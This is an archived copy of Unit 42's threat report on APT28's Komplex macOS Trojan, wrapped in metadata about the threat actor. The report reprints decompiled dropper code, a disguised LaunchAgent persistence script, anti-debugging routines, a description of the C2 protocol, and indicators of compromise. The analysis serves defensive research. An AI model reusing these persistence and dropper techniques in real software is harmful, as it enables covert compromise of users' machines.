{
	"id": "b8c15d71-c883-44b9-9bb1-1fb50e9b1044",
	"created_at": "2026-04-06T00:11:52.315922Z",
	"updated_at": "2026-04-10T03:37:50.20824Z",
	"deleted_at": null,
	"sha1_hash": "b3dd903150abd91b08a78feafd8053706f1a890f",
	"title": "Sofacy’s ‘Komplex’ OS X Trojan",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 820957,
	"plain_text": "Sofacy’s ‘Komplex’ OS X Trojan\r\nBy Dani Creus, Tyler Halfpop, Robert Falcone\r\nPublished: 2016-09-26 · Archived: 2026-04-05 13:12:19 UTC\r\nUnit 42 researchers identified a new OS X Trojan associated with the Sofacy group that we are now tracking with\r\nthe 'Komplex' tag using the Palo Alto Networks AutoFocus threat intelligence platform.\r\nThe Sofacy group, also known as APT28, Pawn Storm, Fancy Bear, and Sednit, continues to add to the variety of\r\ntools they use in attacks; in this case, targeting individuals in the aerospace industry running the OS X operating\r\nsystem. During our analysis, we determined that Komplex was used in a previous attack campaign targeting\r\nindividuals running OS X that exploited a vulnerability in the MacKeeper antivirus application to deliver\r\nKomplex as a payload. Komplex shares a significant amount of functionality and traits with another tool used by\r\nSofacy - the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows. In\r\naddition to shared code and functionality, we also discovered Komplex command and control (C2) domains that\r\noverlapped with previously identified phishing campaign infrastructures associated with the Sofacy group.\r\nKomplex Binder\r\nKomplex is a Trojan that the Sofacy group created to compromise individuals using OS X devices. The Trojan has\r\nmultiple parts, first leading with a binder component that is responsible for saving a second payload and a decoy\r\ndocument to the system. We found three different versions of the Komplex binder, one that was created to run on\r\nx86, another on x64, and a third that contained binders for both x86 and x64 architectures. 
We found the following samples of the Komplex binder:\r\n2a06f142d87bd9b66621a30088683d6fcec019ba5cc9e5793e54f8d920ab0134: Mach-O 64-bit executable x86_64\r\nc1b8fc00d815e777e39f34a520342d1942ebd29695c9453951a988c61875bcd7: Mach-O executable i386\r\ncffa1d9fc336a1ad89af90443b15c98b71e679aeb03b3a68a5e9c3e7ecabc3d4: Mach-O universal binary with 2 architectures\r\nRegardless of architecture, these initial binders all save a second embedded Mach-O file to ‘/tmp/content’. This file is the Komplex dropper used in the next stage of installation and to maintain persistence. After saving the Komplex dropper, these binders then save a legitimate decoy document to the system and open it using the ‘Preview’ application to minimize suspicion of any malicious activity. Figure 1 shows the main function found in one of the initial droppers that saves and opens a PDF decoy, as well as executes another executable file saved as ‘/tmp/content’.\r\nint _main(int arg0, int arg1) {\r\n    var_28 = [[NSAutoreleasePool alloc] init];\r\n    var_38 = [NSSearchPathForDirectoriesInDomains(0xf, 0x1, 0x1) objectAtIndex:0x0];\r\n    var_40 = [NSString stringWithFormat:@\"%@/roskosmos_2015-2025.pdf\", var_38];\r\n    var_48 = [NSString stringWithFormat:@\"SetFile -a E %@/roskosmos_2015-2025.pdf\", var_38];\r\n    var_50 = [NSString stringWithFormat:@\"rm -rf %@/roskosmos_2015-2025.app\", var_38];\r\n    var_58 = [NSString stringWithFormat:@\"open -a Preview.app %@/roskosmos_2015-2025.pdf\", var_38];\r\n    [[NSData dataWithBytes:_joiner length:0x20f74] writeToFile:@\"/tmp/content\" atomically:0x1];\r\n    system([var_50 UTF8String]);\r\n    system(\"chmod 755 /tmp/content\");\r\n    [[NSData dataWithBytes:_pdf length:0x182c82] writeToFile:var_40 atomically:0x1];\r\n    system([var_48 UTF8String]);\r\n    var_70 = [[NSTask alloc] init];\r\n    [var_70 setLaunchPath:@\"/tmp/content\"];\r\n    [var_70 launch];\r\n    [var_70 waitUntilExit];\r\n    system([var_58 UTF8String]);\r\n    remove(*arg1);\r\n    [var_28 release];\r\n    return 0x0;\r\n}\r\nFigure 1 Main function within the Komplex binder\r\nThe binder component saves a decoy document named roskosmos_2015-2025.pdf to the system and opens it using the Preview application built into OS X. Figure 2 shows a portion of the 17 page decoy document. This document is titled “Проект Федеральной космической программы России на 2016 - 2025 годы” (“Draft Federal Space Program of Russia for 2016 - 2025”) and describes the Russian Federal Space Program’s projects between 2016 and 2025. We do not have detailed targeting information regarding the Sofacy group's attack campaign delivering Komplex at this time; however, based on the contents of the decoy document, we believe that the target is likely associated with the aerospace industry.\r\nFigure 2 Decoy document opened by Komplex binder showing document regarding the Russian Space Program\r\nKomplex Dropper\r\nThe Komplex dropper component is saved to the system as “/tmp/content” (SHA256: 96a19a90caa41406b632a2046f3a39b5579fbf730aca2357f84bf23f2cbc1fd3) and is responsible for installing a third executable to the system and setting up persistence for the third executable to launch each time the OS X operating system starts. 
This dropper also provided the basis for the name “Komplex”, which is seen in several folder paths that were included within the Mach-O file, such as “/Users/kazak/Desktop/Project/komplex”.\r\nThe Komplex dropper is fairly straightforward from a functional perspective, as it contains all of its functionality within its “_main” function. The “_main” function (Figure 3) accesses data within three variables named ‘_Payload_1’, ‘_Payload_2’ and ‘_Payload_3’, and writes them to three files on the system.\r\nint _main(int arg0, int arg1) {\r\n    var_38 = [[NSAutoreleasePool alloc] init];\r\n    var_40 = [NSData dataWithBytes:_Payload_1 length:0x15c1c];\r\n    var_48 = [NSData dataWithBytes:_Payload_2 length:0x201];\r\n    var_50 = [NSData dataWithBytes:_Payload_3 length:0x4c];\r\n    system(\"mkdir -p /Users/Shared/.local/ \u0026\u003e /dev/null\");\r\n    system(\"mkdir -p ~/Library/LaunchAgents/ \u0026\u003e /dev/null\");\r\n    [var_40 writeToFile:@\"/Users/Shared/.local/kextd\" atomically:0x1];\r\n    [var_48 writeToFile:@\"/Users/Shared/com.apple.updates.plist\" atomically:0x1];\r\n    [var_50 writeToFile:@\"/Users/Shared/start.sh\" atomically:0x1];\r\n    system(\"cp /Users/Shared/com.apple.updates.plist $HOME/Library/LaunchAgents/ \u0026\u003e/dev/null\");\r\n    remove(\"/Users/Shared/com.apple.updates.plist\");\r\n    system(\"chmod 755 /Users/Shared/.local/kextd\");\r\n    system(\"chmod 755 /Users/Shared/start.sh\");\r\n    var_58 = [[NSTask alloc] init];\r\n    [var_58 setLaunchPath:@\"/Users/Shared/start.sh\"];\r\n    [var_58 launch];\r\n    [var_58 waitUntilExit];\r\n    remove(\"/Users/Shared/start.sh\");\r\n    remove(*arg1);\r\n    [var_38 release];\r\n    return 0x0;\r\n}\r\nFigure 3 Komplex Dropper's main function that drops three files to the system and runs a shell script\r\nThe “_main” function writes the data within ‘_Payload_1’, ‘_Payload_2’, and ‘_Payload_3’ variables to the following files, respectively:\n1. /Users/Shared/.local/kextd (SHA256: 227b7fe495ad9951aebf0aae3c317c1ac526cdd255953f111341b0b11be3bbc5)\n2. /Users/Shared/com.apple.updates.plist (SHA256: 1f22e8f489abff004a3c47210a9642798e1c53efc9d6f333a1072af4b11d71ef)\n3. /Users/Shared/start.sh (SHA256: d494e9f885ad2d6a2686424843142ddc680bb5485414023976b4d15e3b6be800)\nThe shell script saved to ‘/Users/Shared/start.sh’ calls the system command ‘launchctl’ to add a plist entry into ‘launchd’ to automatically execute the Komplex payload each time the system starts. Figure 4 shows the contents of the ‘start.sh’ script that sets up persistence for the payload.\n#!/bin/sh\nlaunchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist\nFigure 4 Contents of the start.sh shell script that calls launchctl\nThe ‘start.sh’ script loads ‘com.apple.updates.plist’, which sets the properties of the Komplex payload that is executed from “/Users/Shared/.local/kextd” at system start up courtesy of the “RunAtLoad” parameter. Figure 5 shows the contents of the ‘com.apple.updates.plist’ file loaded into ‘launchd’.\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\nLabel: com.apple.updates\nProgramArguments: /Users/Shared/.local/kextd\nKeepAlive\nRunAtLoad\nStandardErrorPath: /dev/null\nStandardOutPath: /dev/null\nFigure 5 Contents of the com.apple.updates.plist file showing how the dropper achieves persistence\nKomplex Payload\nThe ultimate purpose of the aforementioned components is to install and execute the Komplex payload. 
The dropper component saves the payload to \"/Users/Shared/.local/kextd\" (SHA256: 227b7fe495ad9951aebf0aae3c317c1ac526cdd255953f111341b0b11be3bbc5) and ultimately executes the payload.\nThe payload begins by conducting an anti-debugging check before proceeding with its main functionality, which can be seen in the “AmIBeingDebugged” function in Figure 6. The “AmIBeingDebugged” function uses the “sysctl” function to check whether the “P_TRACED” flag is set, which signifies that the process is being debugged. A particularly interesting part of this function is that it is very similar to the function provided by Apple to its developers in a guide created in 2004 titled “Detecting the Debugger”. This is not the first time the Sofacy group's malware authors have obtained techniques from publicly available sources, as demonstrated in the use of the Office Test Persistence Method that they obtained from a blog posted in 2014.\nint AmIBeingDebugged()() {\n    var_8 = **__stack_chk_guard;\n    getpid();\n    if ((((sysctl(0x1, 0x4, var_2A8, 0x288, 0x0, 0x0) == 0x0 ? 0x1 : 0x0) ^ 0x1) \u0026 0x1 \u0026 0xff) != 0x0) {\n        rax = __assert_rtn(\"AmIBeingDebugged\", \"/Users/user/Desktop/LoaderWinApi/LoaderWinApi/main.mm\", 0x21, \"junk == 0\");\n    }\n    else {\n        var_2C1 = (0x0 \u0026 0x800) != 0x0 ? 0x1 : 0x0;\n        if (**__stack_chk_guard == var_8) {\n            rax = var_2C1 \u0026 0x1 \u0026 0xff;\n        }\n        else {\n            rax = __stack_chk_fail();\n        }\n    }\n    return rax;\n}\nFigure 6 The AmIBeingDebugged function used as an anti-analysis technique\nAfter determining that it is not running in a debugger, the payload performs an anti-analysis/sandbox check by issuing a GET request to Google to check for Internet connectivity. The payload will sleep until it receives a response to the HTTP requests to Google, which means Komplex will only communicate with its C2 servers in Internet-enabled environments. Figure 7 shows the “connectedToInternet” function that confirms whether the payload is able to communicate with “http://www.google.com” before carrying out its functionality.\nint connectedToInternet()() {\n    if ([NSData dataWithContentsOfURL:[NSURL URLWithString:@\"http://www.google.com\"]] != 0x0) {\n        var_1 = 0x1;\n    }\n    else {\n        var_1 = 0x0;\n    }\n    rax = var_1 \u0026 0x1 \u0026 0xff;\n    return rax;\n}\nFigure 7 The connectedToInternet function testing for an active Internet connection\nAfter confirming an active Internet connection, the Komplex payload begins carrying out its main functionality. The Komplex payload uses an 11-byte XOR algorithm to decrypt strings used for configuration and within C2 communications, including the C2 domains themselves. 
Figure 8 shows a screenshot of Komplex’s custom string decryption algorithm, along with the XOR key used to decrypt strings within the payload.\r\nFigure 8 11-byte XOR algorithm used by Komplex to decrypt configuration strings\r\nThe algorithm seen in Figure 8 decrypts the strings seen in Table 1, which the payload references using the associated variable names. The payload uses these decrypted strings for a variety of purposes, such as command parsing and C2 server locations.\r\nVariable Name | Decrypted String\r\nFILE_NAME | FileName\r\nPATHTOSAVE | PathToSave\r\nSTART_BLOCK_FILE | [file]\r\nBLOCK_EXECUTE | Execute\r\nBLOCK_DELETE | Delete\r\nEND_BLOCK_FILE | [/file]\r\nSERVERS | appleupdate[.]org, apple-iclouds[.]net, itunes-helper[.]net\r\nMAC | mac\r\nCONFIG | config\r\nGET_CONFIG | 1\r\nFILES | file\r\nLOG | log\r\nOLD_CONFIG | 2\r\nID | id\r\nTOKEN | h8sn3vq6kl\r\nEXTENSIONS | .xml .pdf, .htm, .zip\r\nTable 1 Strings decrypted by Komplex and their referenced name\r\nThe Komplex payload uses the SERVERS variable to obtain the location of its C2, which it communicates with using HTTP POST requests. The payload generates a URL to communicate with its C2 server that has the following structure:\r\n/\u003crandom path\u003e/\u003crandom string\u003e.\u003cchosen extension\u003e/?\u003crandom string\u003e=\u003cencrypted token\u003e\r\nThe \u003cchosen extension\u003e portion of the URL is chosen at random from the list of legitimate file extensions: .xml, .zip, .htm and .pdf. The \u003cencrypted token\u003e within the parameters of the URL is base64 encoded ciphertext created from the string ‘h8sn3vq6kl’. The ciphertext of the string is generated via a custom algorithm that uses a random 4-byte integer as a key that is modified by XOR with the static value 0xE150722. 
The payload also encrypts the data sent within the POST request using the same algorithm and encodes it using base64. Figure 9 below shows an example HTTP POST sent from the payload to its C2 server.\r\nFigure 9 Beacon sent from Komplex to C2 containing system information within the HTTP POST data\r\nThe HTTP POST data in Figure 9 consists of information that the malware collects from the infected system. The system information sent to the C2 includes data such as the system version, username, and process list, which is gathered within a function named “getOsInfo” within the “InfoOS” class (Figure 10).\r\nint InfoOS::getOsInfo()() {\r\n    var_38 = rdi;\r\n    var_18 = [[NSProcessInfo processInfo] operatingSystemVersionString];\r\n    var_20 = NSUserName();\r\n    var_28 = InfoOS::getProcessList();\r\n    var_30 = operator new[](strlen(var_28) + 0x200);\r\n    sprintf(var_30, \"Mac OS X - %s %s\\nUser name - %s\\n\\t\\t\\t\\t\\t\\tProcess list :\\n\\n%s\", [var_18 UTF8String], InfoOS::bitOS(), [var_20 UTF8String], var_28);\r\n    rax = var_30;\r\n    return rax;\r\n}\r\nFigure 10 getOsInfo function within Komplex that gathers system information for C2 beacon\r\nThe Sofacy C2 server will respond to this HTTP request with encrypted data that the payload will decrypt using the same custom algorithm used to encrypt the POST data. The Komplex payload will parse the C2 response for the following strings: \"[file]\" and \"[/file]\", \"FileName=\", \"PathToSave=\", \"Shell=\", \"Execute\", and \"Delete\". 
The \"Delete\" action does nothing more than delete a file specified by 'PathToSave'/'FileName', whereas the \"Execute\" action involves running the following system commands before executing the specified file:\r\nmkdir -p \u003c'PathToSave'\u003e \u0026\u003e /dev/null\r\nchmod 755 \u003c'PathToSave'\u003e/\u003c'FileName'\u003e \u0026\u003e /dev/null\r\nThe payload will treat \"[file]\" and \"[/file]\" as delimiters that specify the data that the payload should write to a specified file, which allows the threat actor to download additional files to the system. Lastly, the payload can execute commands on the compromised system specified within the \"Shell\" field, which the payload will execute and then send results back to the C2.\r\nConnections to Sofacy and Previous Attacks\r\nCode Overlaps\r\nWhile reverse engineering the Komplex payload, we came across a few code overlaps that we believed were worth exploring. First, we noticed striking similarities between the Komplex payload and the traits and behavior of an OS X Trojan discussed in a BAE Systems blog titled NEW MAC OS MALWARE EXPLOITS MACKEEPER. According to this blog post, an OS X Trojan was delivered via a vulnerability in the MacKeeper application. The nameless OS X Trojan uses an 11-byte XOR algorithm to decrypt an embedded configuration, which has all of the same variable names and values as the Komplex sample (see Table 1). The algorithm used to encrypt and decrypt the network traffic, as well as all static elements of the network communications (composition of URL, structure of HTTP data, command parsing procedure, etc.) discussed in the blog post are exactly the same as those seen in the Komplex payload. 
These overlaps suggest that the Trojan delivered by the MacKeeper vulnerability was in fact the Komplex Trojan.\r\nThe second code overlap ties the Komplex Trojan to Sofacy’s Carberp variant, which we have analyzed in previous research efforts. Even though Komplex was created to run on OS X and Sofacy’s Carberp variant was developed to run on Windows, they share many commonalities, including:\r\nSame URL generation logic using random path values, a random file extension and an encrypted token\r\nSame file extensions used in the C2 URL, listed within the binaries in the same order\r\nSame algorithm used to encrypt and decrypt the token in the URL and HTTP POST data (the Carberp key is modified using the value 0xAA7D756 whereas Komplex uses 0xE150722)\r\nVery similar command handling, including parsing specifically for Execute, Delete, [file], [/file], FileName, and PathToSave\r\nChecks for Internet connectivity by connecting to google.com\r\nUses an 11-byte XOR key to decrypt strings within the configuration\r\nIn addition to these common traits, we found a Sofacy Carberp variant (SHA256: 638e7ca68643d4b01432f0ecaaa0495b805cc3cccc17a753b0fa511d94a22bdd) using the same TOKEN value of ‘h8sn3vq6kl’ within its C2 URL, as observed in Komplex payloads. Based on these observations, we believe that the author of Sofacy’s Carberp variant used the same code, or at least the same design, to create the Komplex Trojan. 
A benefit of retaining many of the same functionalities within the Windows and OS X Trojans is that it would require fewer alterations to the C2 server application to handle cross-platform implants.\r\nInfrastructure Overlap\r\nWhile Komplex’s C2 domain appleupdate[.]org does not appear to have any previously known activity associated with it, both the apple-iclouds[.]net and itunes-helper[.]net domains have direct ties to Sofacy activity. The apple-iclouds[.]net domain is mentioned within a PwC Tactical Intelligence Bulletin that discussed a phishing campaign conducted by the Sofacy group. The itunes-helper[.]net domain is associated with separate activity discussed in Trend Micro’s blog titled Looking Into a Cyber-Attack Facilitator in the Netherlands that included research on hosting providers used by Pawn Storm (Sofacy).\r\nThe domain appleupdate[.]org does have one interesting correlation point, specifically involving the IP 185.10.58[.]170, to which this domain resolved between April 2015 and April 2016. Researchers at BAE Systems provided Unit 42 the Komplex payload delivered through the exploitation of MacKeeper (Dropper SHA256: da43d39c749c121e99bba00ce809ca63794df3f704e7ad4077094abde4cf2a73 and Payload SHA256: 45a93e4b9ae5bece0d53a3a9a83186b8975953344d4dfb340e9de0015a247c54), which used the IP address 185.10.58[.]170 within its configuration as a C2 server. This infrastructure overlap further strengthens the connection between the Komplex payload we discovered and the prior campaign using MacKeeper for delivery.\r\nConclusion\r\nThe Sofacy group created the Komplex Trojan to use in attack campaigns targeting the OS X operating system – a move that showcases their continued evolution toward multi-platform attacks. 
The tool is capable of downloading additional files to the system, executing and deleting files, as well as directly interacting with the system shell. While detailed targeting information is not currently available, we believe Komplex has been used in attacks on individuals related to the aerospace industry, as well as attacks leveraging an exploit in MacKeeper to deliver the Trojan. The Komplex Trojan revealed a design similar to Sofacy’s Carberp variant Trojan, which we believe may have been done in order to handle compromised Windows and OS X systems using the same C2 server application with relative ease.\r\nWhile Unit 42 continues to research and track this threat, Palo Alto Networks customers are protected via the following:\r\nWildFire correctly identifies known Komplex executables as malicious\r\nIPS signature #14442 Sofacy.Gen Command And Control Traffic can detect and block outbound C2 requests generated by the Komplex Trojan.\r\nCustomers can track this Trojan via the Komplex tag in AutoFocus.\r\nIOCs:\r\nHashes:\r\n2a06f142d87bd9b66621a30088683d6fcec019ba5cc9e5793e54f8d920ab0134\r\nc1b8fc00d815e777e39f34a520342d1942ebd29695c9453951a988c61875bcd7\r\ncffa1d9fc336a1ad89af90443b15c98b71e679aeb03b3a68a5e9c3e7ecabc3d4\r\n96a19a90caa41406b632a2046f3a39b5579fbf730aca2357f84bf23f2cbc1fd3\r\n227b7fe495ad9951aebf0aae3c317c1ac526cdd255953f111341b0b11be3bbc5\r\n45a93e4b9ae5bece0d53a3a9a83186b8975953344d4dfb340e9de0015a247c54\r\nC2 Locations:\r\nappleupdate[.]org\r\napple-iclouds[.]net\r\nitunes-helper[.]net\r\n185.10.58.170\r\nSource: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/"
	],
	"report_names": [
		"unit42-sofacys-komplex-os-x-trojan"
	],
	"threat_actors": [
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434312,
	"ts_updated_at": 1775792270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b3dd903150abd91b08a78feafd8053706f1a890f.pdf",
		"text": "https://archive.orkl.eu/b3dd903150abd91b08a78feafd8053706f1a890f.txt",
		"img": "https://archive.orkl.eu/b3dd903150abd91b08a78feafd8053706f1a890f.jpg"
	}
}